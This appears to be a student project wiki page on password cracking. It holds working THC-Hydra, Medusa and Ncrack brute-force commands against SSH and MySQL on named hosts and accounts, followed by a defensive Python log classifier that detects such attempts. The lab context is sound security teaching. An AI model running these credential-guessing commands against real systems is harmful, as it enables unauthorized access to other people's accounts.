Password Cracking

Password cracking is one of the most basic types of attacks. Password cracking is (very broadly) divided into two categories. The first is hash cracking, where a hashed version of a password is obtained through network monitoring, retrieving an encrypted password file, etc., and a tool is then used to break the hash. Common tools for this depend on the situation, but include: Aircrack, for WEP/WPA passwords; John the Ripper, for Unix passwords; and Cain and Abel, for Windows passwords. The second, and the type this project is concerned with, is brute-force remote authentication attacks.

TOOLS USED

THC-Hydra

Homepage

Example Attack

    # Attempting to crack John Doe (jdoe) on ssh with Roget's wordlist
    hydra -ljdoe -P passwd_lists/Roget.words 137.22.73.129 ssh

    # Try cracking on all the .73 hosts we have running, checking extra stuff
    # for passwords, showing all combos, and writing success to file
    hydra -L carletonusers.txt -P passwd_lists/Unabr.dict -M hosts.txt -e ns -v \
        -o valid_credentials.txt

Medusa

Homepage

Example Attack

    # Attempting to crack jdoe on ssh with Roget's wordlist
    medusa -ujdoe -P passwd_lists/Roget.words -h137.22.73.131 -Mssh
    
    # Attempting to crack me on mysql with englex-dict, using ssl
    medusa -ugriffisd -P passwd_lists/englex-dict -h137.22.73.131 -s -Mmysql

Ncrack

Homepage

Example Attack

    # Run on SSH with input username and password list, prioritizing to
    # username:allpasswords, not allusernames:password
    ncrack -U carletonusers.txt -P passwd_lists/Unabr.dict --passwords-first \
        137.22.73.130 -p22

    # Run, very carefully, using built-in lists on SSH
    ncrack -T paranoid 137.22.73.132 -p22

    # Hammer the ever-loving shit out of one pre-determined user
    ncrack --user christjo -T insane 137.22.73.132 -p22
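
From the defender's side, the two guessing orders named in the Ncrack comment above (all passwords for one username versus one password across all usernames) leave different traces in sshd's authentication log. The sketch below is an added example, not part of this wiki or of any of these tools; it assumes OpenSSH's standard "Failed password for ..." syslog lines, and the function names, labels, threshold and sample log are constructed for illustration.

```python
import re
from collections import defaultdict

# OpenSSH failure line: "Failed password for [invalid user ]NAME from IP port N ssh2"
FAILED = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")

def classify_sources(lines, min_failures=5):
    """Return {source_ip: label} for sources with at least min_failures failed logins."""
    attempts = defaultdict(list)  # source ip -> targeted usernames, in log order
    for line in lines:
        m = FAILED.search(line)
        if m:
            user, ip = m.groups()
            attempts[ip].append(user)
    verdicts = {}
    for ip, users in attempts.items():
        if len(users) < min_failures:
            continue
        distinct = len(set(users))
        # Count how often the targeted username changes between consecutive failures.
        switches = sum(1 for a, b in zip(users, users[1:]) if a != b)
        if distinct == 1:
            verdicts[ip] = "single-user"
        elif switches == distinct - 1:
            # Each username appears as one contiguous run: one account at a time.
            # Per-account lockout thresholds see this pattern.
            verdicts[ip] = "user-by-user"
        else:
            # Usernames interleave: few failures per account at any moment, so
            # failures must also be counted per source to catch it.
            verdicts[ip] = "password-by-password"
    return verdicts

def _line(user, ip, invalid=False):
    # Constructed sample line in OpenSSH's syslog format (timestamp, host, pid are made up).
    who = ("invalid user " if invalid else "") + user
    return f"Mar  3 10:00:00 host sshd[4242]: Failed password for {who} from {ip} port 40000 ssh2"

# Constructed sample log; addresses are from the RFC 5737 documentation ranges.
SAMPLE = (
    [_line("jdoe", "192.0.2.10")] * 6
    + [_line(u, "198.51.100.7") for u in ["alice"] * 3 + ["bob"] * 3]
    + [_line(u, "203.0.113.5", invalid=(u == "carol")) for u in ["alice", "bob", "carol"] * 2]
    + [_line("jdoe", "192.0.2.99")] * 2  # below threshold, e.g. a mistyped password
)

if __name__ == "__main__":
    for ip, label in classify_sources(SAMPLE).items():
        print(ip, label)
```

The ordering test is a heuristic: a tool running several parallel connections can interleave usernames even when it works through one account at a time.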

ATTACK PROFILE

????
